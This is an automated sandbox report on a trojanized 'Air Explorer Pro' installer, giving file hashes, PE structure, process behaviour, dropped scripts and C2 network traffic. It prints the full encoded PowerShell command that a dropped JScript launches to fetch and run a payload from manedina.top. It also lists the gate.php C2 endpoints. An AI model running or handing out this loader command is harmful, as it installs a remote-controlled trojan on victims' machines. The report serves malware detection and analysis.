analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Air.Explorer.Pro-2.6.1.exe

Full analysis: https://app.any.run/tasks/97c2ad2b-a602-4175-bf6f-61dfe8d3b3aa
Verdict: Malicious activity
Threats:

Trojans are a group of malicious programs distinguished by their ability to masquerade as benign software. Depending on their type, trojans possess a variety of capabilities, ranging from maintaining full remote control over the victim’s machine to stealing data and files, as well as dropping other malware. At the same time, the main functionality of each trojan family can differ significantly depending on its type. The most common trojan infection chain starts with a phishing email.

Malware Trends Tracker     >>>
Analysis date: December 25, 2019, 07:30:50
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
evasion
trojan
Indicators:
MIME: application/x-dosexec
File info: PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
MD5:

19713619144B7FB7F59FAE4263642344

SHA1:

DE04E1DC56A840AF2059BF2C64A313DB84557305

SHA256:

F7D507AF865EDF961A16F7736F05DD06657E19134391D2C1C762C0CA7AB353AB

SSDEEP:

49152:gQ9gGrmwrsOF4SAx8RKTEXstzVgNV0y7dFTpFFCRTwGdyWpPUu5m8j2JqBCc1V:RghOur6RRq3y7xFYR0GLhUGMM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Application was dropped or rewritten from another process

      • packeg.exe (PID: 3952)
      • Air.Explorer.Pro-2.6.1.exe (PID: 3964)
      • install.exe (PID: 3356)
      • install.exe (PID: 3464)

    • Loads dropped or rewritten executable

      • install.exe (PID: 3356)
      • Air.Explorer.Pro-2.6.1.exe (PID: 3964)
      • install.exe (PID: 3464)

    • Writes to a start menu file

      • WScript.exe (PID: 2864)

    • Connects to CnC server

      • powershell.exe (PID: 2448)

  • SUSPICIOUS

    • Executable content was dropped or overwritten

      • packeg.exe (PID: 3952)
      • install.exe (PID: 3356)
      • Air.Explorer.Pro-2.6.1.exe (PID: 3964)
      • Air.Explorer.Pro-2.6.1.exe (PID: 2088)
      • install.exe (PID: 3464)

    • Creates files in the user directory

      • WScript.exe (PID: 2864)
      • Air.Explorer.Pro-2.6.1.exe (PID: 2088)
      • powershell.exe (PID: 2448)

    • Creates a software uninstall entry

      • Air.Explorer.Pro-2.6.1.exe (PID: 3964)
      • install.exe (PID: 3464)

    • Executes scripts

      • Air.Explorer.Pro-2.6.1.exe (PID: 2088)

    • Creates files in the program directory

      • Air.Explorer.Pro-2.6.1.exe (PID: 3964)
      • install.exe (PID: 3464)

    • Starts Internet Explorer

      • Air.Explorer.Pro-2.6.1.exe (PID: 3964)

    • Executes PowerShell scripts

      • WScript.exe (PID: 2864)

    • Checks for external IP

      • powershell.exe (PID: 2448)

    • Check for Java to be installed

      • iexplore.exe (PID: 2436)

  • INFO

    • Application launched itself

      • iexplore.exe (PID: 2436)

    • Changes internet zones settings

      • iexplore.exe (PID: 2436)

    • Changes settings of System certificates

      • iexplore.exe (PID: 3820)

    • Adds / modifies Windows certificates

      • iexplore.exe (PID: 3820)

    • Reads settings of System Certificates

      • iexplore.exe (PID: 2436)

    • Reads Internet Cache Settings

      • iexplore.exe (PID: 3820)

    • Reads internet explorer settings

      • iexplore.exe (PID: 3820)

    • Creates files in the user directory

      • iexplore.exe (PID: 3820)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win32 Executable MS Visual C++ (generic) (67.4)
.dll | Win32 Dynamic Link Library (generic) (14.2)
.exe | Win32 Executable (generic) (9.7)
.exe | Generic Win/DOS Executable (4.3)
.exe | DOS Executable Generic (4.3)

EXIF

EXE

Subsystem: Windows GUI
SubsystemVersion: 4
ImageVersion: 6
OSVersion: 4
EntryPoint: 0x310d
UninitializedDataSize: 1024
InitializedDataSize: 164864
CodeSize: 24576
LinkerVersion: 6
PEType: PE32
TimeStamp: 2015:12:27 06:38:55+01:00
MachineType: Intel 386 or later, and compatibles

Summary

Architecture: IMAGE_FILE_MACHINE_I386
Subsystem: IMAGE_SUBSYSTEM_WINDOWS_GUI
Compilation Date: 27-Dec-2015 05:38:55
Detected languages:
  • English - United States

DOS Header

Magic number: MZ
Bytes on last page of file: 0x0090
Pages in file: 0x0003
Relocations: 0x0000
Size of header: 0x0004
Min extra paragraphs: 0x0000
Max extra paragraphs: 0xFFFF
Initial SS value: 0x0000
Initial SP value: 0x00B8
Checksum: 0x0000
Initial IP value: 0x0000
Initial CS value: 0x0000
Overlay number: 0x0000
OEM identifier: 0x0000
OEM information: 0x0000
Address of NE header: 0x000000D8

PE Headers

Signature: PE
Machine: IMAGE_FILE_MACHINE_I386
Number of sections: 5
Time date stamp: 27-Dec-2015 05:38:55
Pointer to Symbol Table: 0x00000000
Number of symbols: 0
Size of Optional Header: 0x00E0
Characteristics:
  • IMAGE_FILE_32BIT_MACHINE
  • IMAGE_FILE_EXECUTABLE_IMAGE
  • IMAGE_FILE_LINE_NUMS_STRIPPED
  • IMAGE_FILE_LOCAL_SYMS_STRIPPED
  • IMAGE_FILE_RELOCS_STRIPPED

Sections

Name
Virtual Address
Virtual Size
Raw Size
Charateristics
Entropy
.text
0x00001000
0x00005E3C
0x00006000
IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
6.4323
.rdata
0x00007000
0x0000126A
0x00001400
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
5.00589
.data
0x00009000
0x00025D38
0x00000600
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
4.29176
.ndata
0x0002F000
0x00008000
0x00000000
IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
0
.rsrc
0x00037000
0x0000DA58
0x0000DC00
IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
5.47121

Resources

Title
Entropy
Size
Codepage
Language
Type
1
5.19265
727
UNKNOWN
English - United States
RT_MANIFEST
2
2.79597
16936
UNKNOWN
English - United States
RT_ICON
3
3.44834
9640
UNKNOWN
English - United States
RT_ICON
4
4.38074
4264
UNKNOWN
English - United States
RT_ICON
5
4.43602
2440
UNKNOWN
English - United States
RT_ICON
6
2.88653
1128
UNKNOWN
English - United States
RT_ICON
103
2.79371
90
UNKNOWN
English - United States
RT_GROUP_ICON
105
2.66174
256
UNKNOWN
English - United States
RT_DIALOG
106
2.88094
284
UNKNOWN
English - United States
RT_DIALOG
111
2.48825
96
UNKNOWN
English - United States
RT_DIALOG

Imports

ADVAPI32.dll
COMCTL32.dll
GDI32.dll
KERNEL32.dll
SHELL32.dll
USER32.dll
ole32.dll
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
48
Monitored processes
10
Malicious processes
4
Suspicious processes
2

Behavior graph

Click at the process to see the details
drop and start start drop and start drop and start air.explorer.pro-2.6.1.exe no specs air.explorer.pro-2.6.1.exe air.explorer.pro-2.6.1.exe wscript.exe packeg.exe install.exe install.exe iexplore.exe iexplore.exe powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2528"C:\Users\admin\AppData\Local\Temp\Air.Explorer.Pro-2.6.1.exe" C:\Users\admin\AppData\Local\Temp\Air.Explorer.Pro-2.6.1.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
3221226540
2088"C:\Users\admin\AppData\Local\Temp\Air.Explorer.Pro-2.6.1.exe" C:\Users\admin\AppData\Local\Temp\Air.Explorer.Pro-2.6.1.exe
explorer.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
3964"C:\Users\admin\AppData\Roaming\Air.Explorer.Pro-2.6.1.exe" C:\Users\admin\AppData\Roaming\Air.Explorer.Pro-2.6.1.exe
Air.Explorer.Pro-2.6.1.exe
User:
admin
Company:
diakov.net
Integrity Level:
HIGH
Description:
Air Explorer Pro 2.6.1
Exit code:
0
Version:
2.6.1.0
2864"C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Roaming\01.js" C:\Windows\System32\WScript.exe
Air.Explorer.Pro-2.6.1.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.8.7600.16385
3952C:\Users\admin\AppData\Local\Temp\temp\packeg.exe -gm2 -y -pdiakov1C:\Users\admin\AppData\Local\Temp\temp\packeg.exe
Air.Explorer.Pro-2.6.1.exe
User:
admin
Company:
Igor Pavlov
Integrity Level:
HIGH
Description:
7z SFX
Exit code:
0
Version:
18.05
3356C:\Users\admin\AppData\Local\Temp\temp\install.exe /SC:\Users\admin\AppData\Local\Temp\temp\install.exe
Air.Explorer.Pro-2.6.1.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
3464C:\Users\admin\AppData\Local\Temp\hi\install.exeC:\Users\admin\AppData\Local\Temp\hi\install.exe
install.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
2436"C:\Program Files\Internet Explorer\iexplore.exe" -nohomeC:\Program Files\Internet Explorer\iexplore.exe
Air.Explorer.Pro-2.6.1.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Internet Explorer
Exit code:
1
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
3820"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2436 CREDAT:79873C:\Program Files\Internet Explorer\iexplore.exe
iexplore.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Internet Explorer
Exit code:
0
Version:
8.00.7600.16385 (win7_rtm.090713-1255)
2448"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACgATgBlAHcALQBPAGIAagBlAGMAdAAgACcATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAAnACkALgAnAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAnACgAJwBoAHQAdABwADoALwAvAG0AYQBuAGUAZABpAG4AYQAuAHQAbwBwAC8AYgBpAHQALwBJAC4AbQBwADMAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAXgAqACEAfgAnACwAJwBBACcAKQApACkALgBFAG4AdAByAHkAUABvAGkAbgB0AC4AaQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAkAG4AdQBsAGwAKQA7AHMAbABlAGUAcAAgADgAOAA4ADgAC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
WScript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 527
Read events
2 291
Write events
0
Delete events
0

Modification events

No data
Executable files
42
Suspicious files
5
Text files
162
Unknown types
25

Dropped files

PID
Process
Filename
Type
3964Air.Explorer.Pro-2.6.1.exeC:\Program Files\Air Explorer\AirExplorer.exe.configxml
MD5:8EBFFD2214CFF72720C5B1319BBF436F
SHA256:583E045A1D7EDE8D1ADD17F7250AF0B41051D0DAF39075656115BBC8491D89A7
2864WScript.exeC:\Users\admin\appdata\Google.jstext
MD5:D553003C1059702C4F10AFB72E75760A
SHA256:5A87B90BE89AF161813B6C91F6D5982E731A9981AA87AD96E34E70073BF685CF
3964Air.Explorer.Pro-2.6.1.exeC:\Users\admin\AppData\Local\Temp\nsjEB1D.tmp\modern-wizard.bmpimage
MD5:3815E99307C4AC6E8D0740BCC6552938
SHA256:DBC1D4FE52F14A6CA77572E7474390EC17ADEB9C8318089C8B94CBA023E47C07
2088Air.Explorer.Pro-2.6.1.exeC:\Users\admin\AppData\Roaming\01.jstext
MD5:D553003C1059702C4F10AFB72E75760A
SHA256:5A87B90BE89AF161813B6C91F6D5982E731A9981AA87AD96E34E70073BF685CF
3964Air.Explorer.Pro-2.6.1.exeC:\Program Files\Air Explorer\CircularProgressBar.dllexecutable
MD5:E3E063960755CB09EFD78B5D88349E98
SHA256:49CB487E04374BB027E54DA755F79FD6A2F2E9D328C4A95E43C1DDEC71F733A2
3964Air.Explorer.Pro-2.6.1.exeC:\Users\admin\AppData\Local\Temp\nsjEB1D.tmp\nsis-r.bmpimage
MD5:974A95FD76B6F1258C60DB963A12BCE3
SHA256:786ABB630E6F468547662F924BD5C3289A091DA55B701B4D6E1806FD13193DD6
2088Air.Explorer.Pro-2.6.1.exeC:\Users\admin\AppData\Roaming\Air.Explorer.Pro-2.6.1.exeexecutable
MD5:8AFDCAD76A2C2ACC19FAF11F9A62127D
SHA256:4B0D6B9ED40A7A009A89C9F772918039AA55E2E119F34218F6B69CFB7F327724
3964Air.Explorer.Pro-2.6.1.exeC:\Program Files\Air Explorer\AirExplorer.exeexecutable
MD5:1171D000AFDAA88A9AC47C1FFE2D3614
SHA256:67952B15E5168B76A64737589A832E6F06AE809C4F2BB69790AEFF16B78F2758
3964Air.Explorer.Pro-2.6.1.exeC:\Users\admin\AppData\Local\Temp\nsjEB1D.tmp\modern-header.bmpimage
MD5:EF2F034912FA74CCF889B53E36D37FB9
SHA256:232BABCAE56E10FA54EC177F41A1581F67D54F004157BEACF321C700EEEF75F7
3964Air.Explorer.Pro-2.6.1.exeC:\Program Files\Air Explorer\AirExplorerCmd.exeexecutable
MD5:8B17A7089DD7BEE48D46C4011B93E6C1
SHA256:FBA4C84A0BA1DF2DF790FD278744D3ACB48D11BF4470CEAF0DA864B7EDECD9C0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
6
TCP/UDP connections
14
DNS requests
7
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2448
powershell.exe
GET
200
51.38.140.3:80
http://manedina.top/bit/I.mp3
GB
text
36.5 Kb
malicious
2448
powershell.exe
POST
200
51.38.140.3:80
http://manedina.top/8/gate.php
GB
malicious
2448
powershell.exe
POST
200
51.38.140.3:80
http://manedina.top/8/gate.php
GB
malicious
2448
powershell.exe
GET
200
216.239.34.21:80
http://ipinfo.io/ip
US
text
15 b
shared
2448
powershell.exe
GET
200
216.239.34.21:80
http://ipinfo.io/country
US
text
3 b
shared
2436
iexplore.exe
GET
200
204.79.197.200:80
http://www.bing.com/favicon.ico
US
image
237 b
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2436
iexplore.exe
204.79.197.200:80
www.bing.com
Microsoft Corporation
US
whitelisted
3820
iexplore.exe
88.212.201.210:443
counter.yadro.ru
United Network LLC
RU
suspicious
3820
iexplore.exe
172.217.16.174:443
www.google-analytics.com
Google Inc.
US
whitelisted
2448
powershell.exe
216.239.34.21:80
ipinfo.io
Google Inc.
US
whitelisted
3820
iexplore.exe
213.180.204.90:443
an.yandex.ru
YANDEX LLC
RU
whitelisted
3820
iexplore.exe
176.57.71.209:443
diakov.net
unknown
2436
iexplore.exe
176.57.71.209:443
diakov.net
unknown
2448
powershell.exe
51.38.140.3:80
manedina.top
GB
malicious

DNS requests

Domain
IP
Reputation
diakov.net
  • 176.57.71.209
malicious
www.bing.com
  • 204.79.197.200
  • 13.107.21.200
whitelisted
www.google-analytics.com
  • 172.217.16.174
whitelisted
an.yandex.ru
  • 213.180.204.90
  • 93.158.134.90
  • 87.250.250.90
  • 77.88.21.90
  • 213.180.193.90
whitelisted
counter.yadro.ru
  • 88.212.201.210
  • 88.212.201.216
  • 88.212.201.198
  • 88.212.201.204
whitelisted
manedina.top
  • 51.38.140.3
malicious
ipinfo.io
  • 216.239.34.21
  • 216.239.32.21
  • 216.239.38.21
  • 216.239.36.21
shared

Threats

PID
Process
Class
Message
Potentially Bad Traffic
ET DNS Query to a *.top domain - Likely Hostile
2448
powershell.exe
Potentially Bad Traffic
ET INFO HTTP Request to a *.top domain
2448
powershell.exe
Potential Corporate Privacy Violation
ET POLICY Possible External IP Lookup ipinfo.io
2448
powershell.exe
Potential Corporate Privacy Violation
ET POLICY Possible External IP Lookup ipinfo.io
2448
powershell.exe
A Network Trojan was detected
ET TROJAN Trojan Generic - POST To gate.php with no referer
2448
powershell.exe
A Network Trojan was detected
ET TROJAN Trojan Generic - POST To gate.php with no accept headers
2448
powershell.exe
A Network Trojan was detected
MALWARE [PTsecurity] ModernLoader
2448
powershell.exe
A Network Trojan was detected
ET TROJAN Trojan Generic - POST To gate.php with no referer
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Air.Explorer.Pro-2.6.1.exe